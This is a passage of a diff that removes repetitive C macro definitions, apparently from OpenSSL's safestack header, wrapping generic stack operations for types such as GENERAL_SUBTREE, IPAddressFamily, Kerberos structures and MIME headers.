-#define sk_GENERAL_SUBTREE_new(cmp) SKM_sk_new(GENERAL_SUBTREE, (cmp))
-#define sk_GENERAL_SUBTREE_new_null() SKM_sk_new_null(GENERAL_SUBTREE)
-#define sk_GENERAL_SUBTREE_free(st) SKM_sk_free(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_num(st) SKM_sk_num(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_value(st, i) SKM_sk_value(GENERAL_SUBTREE, (st), (i))
-#define sk_GENERAL_SUBTREE_set(st, i, val) SKM_sk_set(GENERAL_SUBTREE, (st), (i), (val))
-#define sk_GENERAL_SUBTREE_zero(st) SKM_sk_zero(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_push(st, val) SKM_sk_push(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_unshift(st, val) SKM_sk_unshift(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_find(st, val) SKM_sk_find(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_find_ex(st, val) SKM_sk_find_ex(GENERAL_SUBTREE, (st), (val))
-#define sk_GENERAL_SUBTREE_delete(st, i) SKM_sk_delete(GENERAL_SUBTREE, (st), (i))
-#define sk_GENERAL_SUBTREE_delete_ptr(st, ptr) SKM_sk_delete_ptr(GENERAL_SUBTREE, (st), (ptr))
-#define sk_GENERAL_SUBTREE_insert(st, val, i) SKM_sk_insert(GENERAL_SUBTREE, (st), (val), (i))
-#define sk_GENERAL_SUBTREE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(GENERAL_SUBTREE, (st), (cmp))
-#define sk_GENERAL_SUBTREE_dup(st) SKM_sk_dup(GENERAL_SUBTREE, st)
-#define sk_GENERAL_SUBTREE_pop_free(st, free_func) SKM_sk_pop_free(GENERAL_SUBTREE, (st), (free_func))
-#define sk_GENERAL_SUBTREE_shift(st) SKM_sk_shift(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_pop(st) SKM_sk_pop(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_sort(st) SKM_sk_sort(GENERAL_SUBTREE, (st))
-#define sk_GENERAL_SUBTREE_is_sorted(st) SKM_sk_is_sorted(GENERAL_SUBTREE, (st))
-
-#define sk_IPAddressFamily_new(cmp) SKM_sk_new(IPAddressFamily, (cmp))
-#define sk_IPAddressFamily_new_null() SKM_sk_new_null(IPAddressFamily)
-#define sk_IPAddressFamily_free(st) SKM_sk_free(IPAddressFamily, (st))
-#define sk_IPAddressFamily_num(st) SKM_sk_num(IPAddressFamily, (st))
-#define sk_IPAddressFamily_value(st, i) SKM_sk_value(IPAddressFamily, (st), (i))
-#define sk_IPAddressFamily_set(st, i, val) SKM_sk_set(IPAddressFamily, (st), (i), (val))
-#define sk_IPAddressFamily_zero(st) SKM_sk_zero(IPAddressFamily, (st))
-#define sk_IPAddressFamily_push(st, val) SKM_sk_push(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_unshift(st, val) SKM_sk_unshift(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_find(st, val) SKM_sk_find(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_find_ex(st, val) SKM_sk_find_ex(IPAddressFamily, (st), (val))
-#define sk_IPAddressFamily_delete(st, i) SKM_sk_delete(IPAddressFamily, (st), (i))
-#define sk_IPAddressFamily_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressFamily, (st), (ptr))
-#define sk_IPAddressFamily_insert(st, val, i) SKM_sk_insert(IPAddressFamily, (st), (val), (i))
-#define sk_IPAddressFamily_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressFamily, (st), (cmp))
-#define sk_IPAddressFamily_dup(st) SKM_sk_dup(IPAddressFamily, st)
-#define sk_IPAddressFamily_pop_free(st, free_func) SKM_sk_pop_free(IPAddressFamily, (st), (free_func))
-#define sk_IPAddressFamily_shift(st) SKM_sk_shift(IPAddressFamily, (st))
-#define sk_IPAddressFamily_pop(st) SKM_sk_pop(IPAddressFamily, (st))
-#define sk_IPAddressFamily_sort(st) SKM_sk_sort(IPAddressFamily, (st))
-#define sk_IPAddressFamily_is_sorted(st) SKM_sk_is_sorted(IPAddressFamily, (st))
-
-#define sk_IPAddressOrRange_new(cmp) SKM_sk_new(IPAddressOrRange, (cmp))
-#define sk_IPAddressOrRange_new_null() SKM_sk_new_null(IPAddressOrRange)
-#define sk_IPAddressOrRange_free(st) SKM_sk_free(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_num(st) SKM_sk_num(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_value(st, i) SKM_sk_value(IPAddressOrRange, (st), (i))
-#define sk_IPAddressOrRange_set(st, i, val) SKM_sk_set(IPAddressOrRange, (st), (i), (val))
-#define sk_IPAddressOrRange_zero(st) SKM_sk_zero(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_push(st, val) SKM_sk_push(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_unshift(st, val) SKM_sk_unshift(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_find(st, val) SKM_sk_find(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_find_ex(st, val) SKM_sk_find_ex(IPAddressOrRange, (st), (val))
-#define sk_IPAddressOrRange_delete(st, i) SKM_sk_delete(IPAddressOrRange, (st), (i))
-#define sk_IPAddressOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(IPAddressOrRange, (st), (ptr))
-#define sk_IPAddressOrRange_insert(st, val, i) SKM_sk_insert(IPAddressOrRange, (st), (val), (i))
-#define sk_IPAddressOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(IPAddressOrRange, (st), (cmp))
-#define sk_IPAddressOrRange_dup(st) SKM_sk_dup(IPAddressOrRange, st)
-#define sk_IPAddressOrRange_pop_free(st, free_func) SKM_sk_pop_free(IPAddressOrRange, (st), (free_func))
-#define sk_IPAddressOrRange_shift(st) SKM_sk_shift(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_pop(st) SKM_sk_pop(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_sort(st) SKM_sk_sort(IPAddressOrRange, (st))
-#define sk_IPAddressOrRange_is_sorted(st) SKM_sk_is_sorted(IPAddressOrRange, (st))
-
-#define sk_KRB5_APREQBODY_new(cmp) SKM_sk_new(KRB5_APREQBODY, (cmp))
-#define sk_KRB5_APREQBODY_new_null() SKM_sk_new_null(KRB5_APREQBODY)
-#define sk_KRB5_APREQBODY_free(st) SKM_sk_free(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_num(st) SKM_sk_num(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_value(st, i) SKM_sk_value(KRB5_APREQBODY, (st), (i))
-#define sk_KRB5_APREQBODY_set(st, i, val) SKM_sk_set(KRB5_APREQBODY, (st), (i), (val))
-#define sk_KRB5_APREQBODY_zero(st) SKM_sk_zero(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_push(st, val) SKM_sk_push(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_unshift(st, val) SKM_sk_unshift(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_find(st, val) SKM_sk_find(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_APREQBODY, (st), (val))
-#define sk_KRB5_APREQBODY_delete(st, i) SKM_sk_delete(KRB5_APREQBODY, (st), (i))
-#define sk_KRB5_APREQBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_APREQBODY, (st), (ptr))
-#define sk_KRB5_APREQBODY_insert(st, val, i) SKM_sk_insert(KRB5_APREQBODY, (st), (val), (i))
-#define sk_KRB5_APREQBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_APREQBODY, (st), (cmp))
-#define sk_KRB5_APREQBODY_dup(st) SKM_sk_dup(KRB5_APREQBODY, st)
-#define sk_KRB5_APREQBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_APREQBODY, (st), (free_func))
-#define sk_KRB5_APREQBODY_shift(st) SKM_sk_shift(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_pop(st) SKM_sk_pop(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_sort(st) SKM_sk_sort(KRB5_APREQBODY, (st))
-#define sk_KRB5_APREQBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_APREQBODY, (st))
-
-#define sk_KRB5_AUTHDATA_new(cmp) SKM_sk_new(KRB5_AUTHDATA, (cmp))
-#define sk_KRB5_AUTHDATA_new_null() SKM_sk_new_null(KRB5_AUTHDATA)
-#define sk_KRB5_AUTHDATA_free(st) SKM_sk_free(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_num(st) SKM_sk_num(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_value(st, i) SKM_sk_value(KRB5_AUTHDATA, (st), (i))
-#define sk_KRB5_AUTHDATA_set(st, i, val) SKM_sk_set(KRB5_AUTHDATA, (st), (i), (val))
-#define sk_KRB5_AUTHDATA_zero(st) SKM_sk_zero(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_push(st, val) SKM_sk_push(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_unshift(st, val) SKM_sk_unshift(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_find(st, val) SKM_sk_find(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHDATA, (st), (val))
-#define sk_KRB5_AUTHDATA_delete(st, i) SKM_sk_delete(KRB5_AUTHDATA, (st), (i))
-#define sk_KRB5_AUTHDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHDATA, (st), (ptr))
-#define sk_KRB5_AUTHDATA_insert(st, val, i) SKM_sk_insert(KRB5_AUTHDATA, (st), (val), (i))
-#define sk_KRB5_AUTHDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHDATA, (st), (cmp))
-#define sk_KRB5_AUTHDATA_dup(st) SKM_sk_dup(KRB5_AUTHDATA, st)
-#define sk_KRB5_AUTHDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHDATA, (st), (free_func))
-#define sk_KRB5_AUTHDATA_shift(st) SKM_sk_shift(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_pop(st) SKM_sk_pop(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_sort(st) SKM_sk_sort(KRB5_AUTHDATA, (st))
-#define sk_KRB5_AUTHDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHDATA, (st))
-
-#define sk_KRB5_AUTHENTBODY_new(cmp) SKM_sk_new(KRB5_AUTHENTBODY, (cmp))
-#define sk_KRB5_AUTHENTBODY_new_null() SKM_sk_new_null(KRB5_AUTHENTBODY)
-#define sk_KRB5_AUTHENTBODY_free(st) SKM_sk_free(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_num(st) SKM_sk_num(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_value(st, i) SKM_sk_value(KRB5_AUTHENTBODY, (st), (i))
-#define sk_KRB5_AUTHENTBODY_set(st, i, val) SKM_sk_set(KRB5_AUTHENTBODY, (st), (i), (val))
-#define sk_KRB5_AUTHENTBODY_zero(st) SKM_sk_zero(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_push(st, val) SKM_sk_push(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_unshift(st, val) SKM_sk_unshift(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_find(st, val) SKM_sk_find(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_AUTHENTBODY, (st), (val))
-#define sk_KRB5_AUTHENTBODY_delete(st, i) SKM_sk_delete(KRB5_AUTHENTBODY, (st), (i))
-#define sk_KRB5_AUTHENTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_AUTHENTBODY, (st), (ptr))
-#define sk_KRB5_AUTHENTBODY_insert(st, val, i) SKM_sk_insert(KRB5_AUTHENTBODY, (st), (val), (i))
-#define sk_KRB5_AUTHENTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_AUTHENTBODY, (st), (cmp))
-#define sk_KRB5_AUTHENTBODY_dup(st) SKM_sk_dup(KRB5_AUTHENTBODY, st)
-#define sk_KRB5_AUTHENTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_AUTHENTBODY, (st), (free_func))
-#define sk_KRB5_AUTHENTBODY_shift(st) SKM_sk_shift(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_pop(st) SKM_sk_pop(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_sort(st) SKM_sk_sort(KRB5_AUTHENTBODY, (st))
-#define sk_KRB5_AUTHENTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_AUTHENTBODY, (st))
-
-#define sk_KRB5_CHECKSUM_new(cmp) SKM_sk_new(KRB5_CHECKSUM, (cmp))
-#define sk_KRB5_CHECKSUM_new_null() SKM_sk_new_null(KRB5_CHECKSUM)
-#define sk_KRB5_CHECKSUM_free(st) SKM_sk_free(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_num(st) SKM_sk_num(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_value(st, i) SKM_sk_value(KRB5_CHECKSUM, (st), (i))
-#define sk_KRB5_CHECKSUM_set(st, i, val) SKM_sk_set(KRB5_CHECKSUM, (st), (i), (val))
-#define sk_KRB5_CHECKSUM_zero(st) SKM_sk_zero(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_push(st, val) SKM_sk_push(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_unshift(st, val) SKM_sk_unshift(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_find(st, val) SKM_sk_find(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_find_ex(st, val) SKM_sk_find_ex(KRB5_CHECKSUM, (st), (val))
-#define sk_KRB5_CHECKSUM_delete(st, i) SKM_sk_delete(KRB5_CHECKSUM, (st), (i))
-#define sk_KRB5_CHECKSUM_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_CHECKSUM, (st), (ptr))
-#define sk_KRB5_CHECKSUM_insert(st, val, i) SKM_sk_insert(KRB5_CHECKSUM, (st), (val), (i))
-#define sk_KRB5_CHECKSUM_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_CHECKSUM, (st), (cmp))
-#define sk_KRB5_CHECKSUM_dup(st) SKM_sk_dup(KRB5_CHECKSUM, st)
-#define sk_KRB5_CHECKSUM_pop_free(st, free_func) SKM_sk_pop_free(KRB5_CHECKSUM, (st), (free_func))
-#define sk_KRB5_CHECKSUM_shift(st) SKM_sk_shift(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_pop(st) SKM_sk_pop(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_sort(st) SKM_sk_sort(KRB5_CHECKSUM, (st))
-#define sk_KRB5_CHECKSUM_is_sorted(st) SKM_sk_is_sorted(KRB5_CHECKSUM, (st))
-
-#define sk_KRB5_ENCDATA_new(cmp) SKM_sk_new(KRB5_ENCDATA, (cmp))
-#define sk_KRB5_ENCDATA_new_null() SKM_sk_new_null(KRB5_ENCDATA)
-#define sk_KRB5_ENCDATA_free(st) SKM_sk_free(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_num(st) SKM_sk_num(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_value(st, i) SKM_sk_value(KRB5_ENCDATA, (st), (i))
-#define sk_KRB5_ENCDATA_set(st, i, val) SKM_sk_set(KRB5_ENCDATA, (st), (i), (val))
-#define sk_KRB5_ENCDATA_zero(st) SKM_sk_zero(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_push(st, val) SKM_sk_push(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_unshift(st, val) SKM_sk_unshift(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_find(st, val) SKM_sk_find(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCDATA, (st), (val))
-#define sk_KRB5_ENCDATA_delete(st, i) SKM_sk_delete(KRB5_ENCDATA, (st), (i))
-#define sk_KRB5_ENCDATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCDATA, (st), (ptr))
-#define sk_KRB5_ENCDATA_insert(st, val, i) SKM_sk_insert(KRB5_ENCDATA, (st), (val), (i))
-#define sk_KRB5_ENCDATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCDATA, (st), (cmp))
-#define sk_KRB5_ENCDATA_dup(st) SKM_sk_dup(KRB5_ENCDATA, st)
-#define sk_KRB5_ENCDATA_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCDATA, (st), (free_func))
-#define sk_KRB5_ENCDATA_shift(st) SKM_sk_shift(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_pop(st) SKM_sk_pop(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_sort(st) SKM_sk_sort(KRB5_ENCDATA, (st))
-#define sk_KRB5_ENCDATA_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCDATA, (st))
-
-#define sk_KRB5_ENCKEY_new(cmp) SKM_sk_new(KRB5_ENCKEY, (cmp))
-#define sk_KRB5_ENCKEY_new_null() SKM_sk_new_null(KRB5_ENCKEY)
-#define sk_KRB5_ENCKEY_free(st) SKM_sk_free(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_num(st) SKM_sk_num(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_value(st, i) SKM_sk_value(KRB5_ENCKEY, (st), (i))
-#define sk_KRB5_ENCKEY_set(st, i, val) SKM_sk_set(KRB5_ENCKEY, (st), (i), (val))
-#define sk_KRB5_ENCKEY_zero(st) SKM_sk_zero(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_push(st, val) SKM_sk_push(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_unshift(st, val) SKM_sk_unshift(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_find(st, val) SKM_sk_find(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_find_ex(st, val) SKM_sk_find_ex(KRB5_ENCKEY, (st), (val))
-#define sk_KRB5_ENCKEY_delete(st, i) SKM_sk_delete(KRB5_ENCKEY, (st), (i))
-#define sk_KRB5_ENCKEY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_ENCKEY, (st), (ptr))
-#define sk_KRB5_ENCKEY_insert(st, val, i) SKM_sk_insert(KRB5_ENCKEY, (st), (val), (i))
-#define sk_KRB5_ENCKEY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_ENCKEY, (st), (cmp))
-#define sk_KRB5_ENCKEY_dup(st) SKM_sk_dup(KRB5_ENCKEY, st)
-#define sk_KRB5_ENCKEY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_ENCKEY, (st), (free_func))
-#define sk_KRB5_ENCKEY_shift(st) SKM_sk_shift(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_pop(st) SKM_sk_pop(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_sort(st) SKM_sk_sort(KRB5_ENCKEY, (st))
-#define sk_KRB5_ENCKEY_is_sorted(st) SKM_sk_is_sorted(KRB5_ENCKEY, (st))
-
-#define sk_KRB5_PRINCNAME_new(cmp) SKM_sk_new(KRB5_PRINCNAME, (cmp))
-#define sk_KRB5_PRINCNAME_new_null() SKM_sk_new_null(KRB5_PRINCNAME)
-#define sk_KRB5_PRINCNAME_free(st) SKM_sk_free(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_num(st) SKM_sk_num(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_value(st, i) SKM_sk_value(KRB5_PRINCNAME, (st), (i))
-#define sk_KRB5_PRINCNAME_set(st, i, val) SKM_sk_set(KRB5_PRINCNAME, (st), (i), (val))
-#define sk_KRB5_PRINCNAME_zero(st) SKM_sk_zero(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_push(st, val) SKM_sk_push(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_unshift(st, val) SKM_sk_unshift(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_find(st, val) SKM_sk_find(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_find_ex(st, val) SKM_sk_find_ex(KRB5_PRINCNAME, (st), (val))
-#define sk_KRB5_PRINCNAME_delete(st, i) SKM_sk_delete(KRB5_PRINCNAME, (st), (i))
-#define sk_KRB5_PRINCNAME_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_PRINCNAME, (st), (ptr))
-#define sk_KRB5_PRINCNAME_insert(st, val, i) SKM_sk_insert(KRB5_PRINCNAME, (st), (val), (i))
-#define sk_KRB5_PRINCNAME_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_PRINCNAME, (st), (cmp))
-#define sk_KRB5_PRINCNAME_dup(st) SKM_sk_dup(KRB5_PRINCNAME, st)
-#define sk_KRB5_PRINCNAME_pop_free(st, free_func) SKM_sk_pop_free(KRB5_PRINCNAME, (st), (free_func))
-#define sk_KRB5_PRINCNAME_shift(st) SKM_sk_shift(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_pop(st) SKM_sk_pop(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_sort(st) SKM_sk_sort(KRB5_PRINCNAME, (st))
-#define sk_KRB5_PRINCNAME_is_sorted(st) SKM_sk_is_sorted(KRB5_PRINCNAME, (st))
-
-#define sk_KRB5_TKTBODY_new(cmp) SKM_sk_new(KRB5_TKTBODY, (cmp))
-#define sk_KRB5_TKTBODY_new_null() SKM_sk_new_null(KRB5_TKTBODY)
-#define sk_KRB5_TKTBODY_free(st) SKM_sk_free(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_num(st) SKM_sk_num(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_value(st, i) SKM_sk_value(KRB5_TKTBODY, (st), (i))
-#define sk_KRB5_TKTBODY_set(st, i, val) SKM_sk_set(KRB5_TKTBODY, (st), (i), (val))
-#define sk_KRB5_TKTBODY_zero(st) SKM_sk_zero(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_push(st, val) SKM_sk_push(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_unshift(st, val) SKM_sk_unshift(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_find(st, val) SKM_sk_find(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_find_ex(st, val) SKM_sk_find_ex(KRB5_TKTBODY, (st), (val))
-#define sk_KRB5_TKTBODY_delete(st, i) SKM_sk_delete(KRB5_TKTBODY, (st), (i))
-#define sk_KRB5_TKTBODY_delete_ptr(st, ptr) SKM_sk_delete_ptr(KRB5_TKTBODY, (st), (ptr))
-#define sk_KRB5_TKTBODY_insert(st, val, i) SKM_sk_insert(KRB5_TKTBODY, (st), (val), (i))
-#define sk_KRB5_TKTBODY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(KRB5_TKTBODY, (st), (cmp))
-#define sk_KRB5_TKTBODY_dup(st) SKM_sk_dup(KRB5_TKTBODY, st)
-#define sk_KRB5_TKTBODY_pop_free(st, free_func) SKM_sk_pop_free(KRB5_TKTBODY, (st), (free_func))
-#define sk_KRB5_TKTBODY_shift(st) SKM_sk_shift(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_pop(st) SKM_sk_pop(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_sort(st) SKM_sk_sort(KRB5_TKTBODY, (st))
-#define sk_KRB5_TKTBODY_is_sorted(st) SKM_sk_is_sorted(KRB5_TKTBODY, (st))
-
-#define sk_MEM_OBJECT_DATA_new(cmp) SKM_sk_new(MEM_OBJECT_DATA, (cmp))
-#define sk_MEM_OBJECT_DATA_new_null() SKM_sk_new_null(MEM_OBJECT_DATA)
-#define sk_MEM_OBJECT_DATA_free(st) SKM_sk_free(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_num(st) SKM_sk_num(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_value(st, i) SKM_sk_value(MEM_OBJECT_DATA, (st), (i))
-#define sk_MEM_OBJECT_DATA_set(st, i, val) SKM_sk_set(MEM_OBJECT_DATA, (st), (i), (val))
-#define sk_MEM_OBJECT_DATA_zero(st) SKM_sk_zero(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_push(st, val) SKM_sk_push(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_unshift(st, val) SKM_sk_unshift(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_find(st, val) SKM_sk_find(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_find_ex(st, val) SKM_sk_find_ex(MEM_OBJECT_DATA, (st), (val))
-#define sk_MEM_OBJECT_DATA_delete(st, i) SKM_sk_delete(MEM_OBJECT_DATA, (st), (i))
-#define sk_MEM_OBJECT_DATA_delete_ptr(st, ptr) SKM_sk_delete_ptr(MEM_OBJECT_DATA, (st), (ptr))
-#define sk_MEM_OBJECT_DATA_insert(st, val, i) SKM_sk_insert(MEM_OBJECT_DATA, (st), (val), (i))
-#define sk_MEM_OBJECT_DATA_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MEM_OBJECT_DATA, (st), (cmp))
-#define sk_MEM_OBJECT_DATA_dup(st) SKM_sk_dup(MEM_OBJECT_DATA, st)
-#define sk_MEM_OBJECT_DATA_pop_free(st, free_func) SKM_sk_pop_free(MEM_OBJECT_DATA, (st), (free_func))
-#define sk_MEM_OBJECT_DATA_shift(st) SKM_sk_shift(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_pop(st) SKM_sk_pop(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_sort(st) SKM_sk_sort(MEM_OBJECT_DATA, (st))
-#define sk_MEM_OBJECT_DATA_is_sorted(st) SKM_sk_is_sorted(MEM_OBJECT_DATA, (st))
-
-#define sk_MIME_HEADER_new(cmp) SKM_sk_new(MIME_HEADER, (cmp))
-#define sk_MIME_HEADER_new_null() SKM_sk_new_null(MIME_HEADER)
-#define sk_MIME_HEADER_free(st) SKM_sk_free(MIME_HEADER, (st))
-#define sk_MIME_HEADER_num(st) SKM_sk_num(MIME_HEADER, (st))
-#define sk_MIME_HEADER_value(st, i) SKM_sk_value(MIME_HEADER, (st), (i))
-#define sk_MIME_HEADER_set(st, i, val) SKM_sk_set(MIME_HEADER, (st), (i), (val))
-#define sk_MIME_HEADER_zero(st) SKM_sk_zero(MIME_HEADER, (st))
-#define sk_MIME_HEADER_push(st, val) SKM_sk_push(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_unshift(st, val) SKM_sk_unshift(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_find(st, val) SKM_sk_find(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_find_ex(st, val) SKM_sk_find_ex(MIME_HEADER, (st), (val))
-#define sk_MIME_HEADER_delete(st, i) SKM_sk_delete(MIME_HEADER, (st), (i))
-#define sk_MIME_HEADER_delete_ptr(st, ptr) SKM_sk_delete_ptr(MIME_HEADER, (st), (ptr))
-#define sk_MIME_HEADER_insert(st, val, i) SKM_sk_insert(MIME_HEADER, (st), (val), (i))
-#define sk_MIME_HEADER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(MIME_HEADER, (st), (cmp))
-#define sk_MIME_HEADER_dup(st) SKM_sk_dup(MIME_HEADER, st)
-#define sk_MIME_HEADER_pop_free(st, free_func) SKM_sk_pop_free(MIME_HEADER, (st), (free_func))
-#define sk_MIME_HEADER_shift(st) SKM_sk_shift(MIME_HEADER, (st))
-#define sk_MIME_HEADER_pop(st) SKM_sk_pop(MIME_HEADER, (st))
-#define sk_MIME_HEADER_sort(st) SKM_sk_sort(MIME_HEADER, (st))
-#define sk_MIME_HEADER_is_sorted(st) SKM_sk_is_sorted(MIME_HEADER, (st))
-
-#define sk_MIME_PARAM_new(cmp) SKM_sk_new(MIME_PARAM, (cmp))
-#define sk_MIME_PARAM_new_null() SKM_sk_new_null(MIME_PARAM)
-#define sk_MIME_PARAM_free(st) SKM_sk_free(MIME_PARAM, (st))
-#define sk_MIME_PARAM_num(st) SKM_sk_num(MIME_PARAM, (st))
-#define sk_MIME_PARAM_value(st, i) SKM_sk_value(MIME_PARAM, (st), (i))
-#define sk_MIME_PARAM_set(st, i, val) SKM_sk_set(MIME_PARAM, (st), (i), (val))
